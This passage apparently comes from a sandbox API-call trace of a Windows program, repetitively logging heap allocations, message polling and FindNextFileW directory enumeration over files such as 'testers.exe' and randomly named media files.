wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.452] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e19210, ftCreationTime.dwHighDateTime=0x1d5df9a, ftLastAccessTime.dwLowDateTime=0x2f441200, ftLastAccessTime.dwHighDateTime=0x1d5dd75, ftLastWriteTime.dwLowDateTime=0x2f441200, ftLastWriteTime.dwHighDateTime=0x1d5dd75, nFileSizeHigh=0x0, nFileSizeLow=0x11488, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="s1epd3.png", cAlternateFileName="")) returned 1 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.453] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.453] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.453] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.453] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.453] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.453] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.453] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc1a62260, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc1a62260, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc3764e80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x10, dwReserved1=0x657690, cFileName="testers.exe", cAlternateFileName="")) returned 1 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.453] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.453] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.454] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.454] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.454] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.454] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.454] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.454] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b7cd50, ftCreationTime.dwHighDateTime=0x1d5e14b, ftLastAccessTime.dwLowDateTime=0x33873000, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x33873000, ftLastWriteTime.dwHighDateTime=0x1d5df90, nFileSizeHigh=0x0, nFileSizeLow=0x411c, dwReserved0=0x10, dwReserved1=0x657690, cFileName="TtEAhK_e6.flv", cAlternateFileName="TTEAHK~1.FLV")) returned 1 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.454] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.454] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.455] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebdc050, ftCreationTime.dwHighDateTime=0x1d5e739, ftLastAccessTime.dwLowDateTime=0xfe74e650, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0xfe74e650, ftLastWriteTime.dwHighDateTime=0x1d5dcab, nFileSizeHigh=0x0, nFileSizeLow=0x1828a, dwReserved0=0x10, dwReserved1=0x657690, cFileName="urMVeYqgrC9wPF_WA.mp4", cAlternateFileName="URMVEY~1.MP4")) returned 1 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.455] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.455] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.456] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.456] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9970 [0073.456] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.456] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.456] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.456] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332a6c0, ftCreationTime.dwHighDateTime=0x1d5df48, ftLastAccessTime.dwLowDateTime=0xc3dcaee0, ftLastAccessTime.dwHighDateTime=0x1d5e6d5, ftLastWriteTime.dwLowDateTime=0xc3dcaee0, ftLastWriteTime.dwHighDateTime=0x1d5e6d5, nFileSizeHigh=0x0, nFileSizeLow=0x41a7, dwReserved0=0x10, dwReserved1=0x657690, cFileName="VLNsdshtM2X.png", cAlternateFileName="VLNSDS~1.PNG")) returned 1 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.456] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.456] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.456] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.457] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.457] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.457] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.457] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.457] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f95e030, ftCreationTime.dwHighDateTime=0x1d5dc57, ftLastAccessTime.dwLowDateTime=0x985b5670, ftLastAccessTime.dwHighDateTime=0x1d5de8f, ftLastWriteTime.dwLowDateTime=0x985b5670, ftLastWriteTime.dwHighDateTime=0x1d5de8f, nFileSizeHigh=0x0, nFileSizeLow=0x9f3, dwReserved0=0x10, dwReserved1=0x657690, cFileName="wDndAAy--Qv4hO-j v.flv", cAlternateFileName="WDNDAA~1.FLV")) returned 1 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.457] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.457] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.457] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.457] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9970 [0073.458] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.458] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.458] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.458] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e64a30, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x3c03b0, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0x3c03b0, ftLastWriteTime.dwHighDateTime=0x1d5e2ec, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0x10, dwReserved1=0x657690, cFileName="wE2eF3.flv", cAlternateFileName="")) returned 1 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.458] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.458] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.458] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.458] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.459] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.459] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.459] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.459] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.459] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8858920, ftCreationTime.dwHighDateTime=0x1d5dd7c, ftLastAccessTime.dwLowDateTime=0x52b3ff80, ftLastAccessTime.dwHighDateTime=0x1d5dff4, 